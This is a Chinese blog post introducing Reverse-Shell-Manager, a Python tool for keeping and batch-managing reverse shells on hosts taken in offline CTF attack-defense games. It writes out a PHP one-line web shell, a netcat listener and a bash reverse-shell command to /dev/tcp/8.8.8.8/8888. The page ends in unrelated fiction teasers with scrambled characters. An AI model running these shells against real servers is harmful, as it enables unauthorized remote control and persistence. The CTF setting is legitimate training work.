[工具介紹] 反彈 shell 管理工具


GitHub 倉庫

https://github.com/WangYihang/Reverse-Shell-Manager


介紹一款基于 Python 開發(fā)的 反彈 shell 管理工具 Reverse-Shell-Manager

在 CTF線下賽 的時候 , 如果通過 web 或者 pwn 已經(jīng)拿到了一臺服務(wù)器的控制權(quán)
那么我們可以使用反彈 shell 來對該服務(wù)器進行一個長期的權(quán)限維持
一般反彈 shell 的時候我們會怎么做呢 ?
比如說這里有一個臺服務(wù)器可以 RCE 了

<?php system($_GET[c]);?>

如果要反彈的話 , 我們首先要在自己的服務(wù)器上監(jiān)聽一個端口 :

nc -l 8888

然后再在目標服務(wù)器上執(zhí)行 :

bash -c 'bash -i >&/dev/tcp/8.8.8.8/8888 0>&1'

這樣就能拿到該服務(wù)器的 shell 了
但是
一旦鏈接斷開 , 那么就要重新利用漏洞反彈一個新的 shell
這樣是不是很麻煩 , 而且還會暴露漏洞是如何被利用的
如果對方抓取了流量進行分析的話 , 很快就會把漏洞補上

而且
一般線下賽很多時候需要一些自動化的腳本來運維和進行權(quán)限維持
所以寫了一個小工具 , 希望能有用

大概功能就是 :

監(jiān)聽一個端口 , 可以處理所有連接過來的請求
可以對已經(jīng)連接的主機進行批量管理 (例如一鍵獲取 flag)
保證一臺主機不會出現(xiàn)多個連接
對已經(jīng)下線的主機進行自動檢測
image.png

下面有一個簡單的介紹視頻 :

使用視頻

如果可以給你帶來幫助的話 , 可不可以 Star 一下吶 , ヽ(??▽?)ノ

TODO

1. 端口轉(zhuǎn)發(fā)
2. 多層級聯(lián) 
...
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末捻浦,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子桥爽,更是在濱河造成了極大的恐慌朱灿,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,376評論 6 491
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件钠四,死亡現(xiàn)場離奇詭異盗扒,居然都是意外死亡,警方通過查閱死者的電腦和手機缀去,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,126評論 2 385
  • 文/潘曉璐 我一進店門侣灶,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人缕碎,你說我怎么就攤上這事褥影。” “怎么了咏雌?”我有些...
    開封第一講書人閱讀 156,966評論 0 347
  • 文/不壞的土叔 我叫張陵凡怎,是天一觀的道長校焦。 經(jīng)常有香客問我,道長栅贴,這世上最難降的妖魔是什么斟湃? 我笑而不...
    開封第一講書人閱讀 56,432評論 1 283
  • 正文 為了忘掉前任,我火速辦了婚禮檐薯,結(jié)果婚禮上凝赛,老公的妹妹穿的比我還像新娘。我一直安慰自己坛缕,他們只是感情好墓猎,可當我...
    茶點故事閱讀 65,519評論 6 385
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著赚楚,像睡著了一般毙沾。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上宠页,一...
    開封第一講書人閱讀 49,792評論 1 290
  • 那天左胞,我揣著相機與錄音,去河邊找鬼举户。 笑死烤宙,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的俭嘁。 我是一名探鬼主播躺枕,決...
    沈念sama閱讀 38,933評論 3 406
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼供填!你這毒婦竟也來了拐云?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,701評論 0 266
  • 序言:老撾萬榮一對情侶失蹤近她,失蹤者是張志新(化名)和其女友劉穎叉瘩,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體粘捎,經(jīng)...
    沈念sama閱讀 44,143評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡薇缅,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,488評論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了晌端。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片捅暴。...
    茶點故事閱讀 38,626評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡恬砂,死狀恐怖咧纠,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情泻骤,我是刑警寧澤漆羔,帶...
    沈念sama閱讀 34,292評論 4 329
  • 正文 年R本政府宣布梧奢,位于F島的核電站,受9級特大地震影響演痒,放射性物質(zhì)發(fā)生泄漏亲轨。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,896評論 3 313
  • 文/蒙蒙 一鸟顺、第九天 我趴在偏房一處隱蔽的房頂上張望惦蚊。 院中可真熱鬧,春花似錦讯嫂、人聲如沸蹦锋。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,742評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽莉掂。三九已至,卻和暖如春千扔,著一層夾襖步出監(jiān)牢的瞬間憎妙,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,977評論 1 265
  • 我被黑心中介騙來泰國打工曲楚, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留厘唾,地道東北人。 一個月前我還...
    沈念sama閱讀 46,324評論 2 360
  • 正文 我出身青樓洞渤,卻偏偏與公主長得像阅嘶,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子载迄,可洞房花燭夜當晚...
    茶點故事閱讀 43,494評論 2 348

推薦閱讀更多精彩內(nèi)容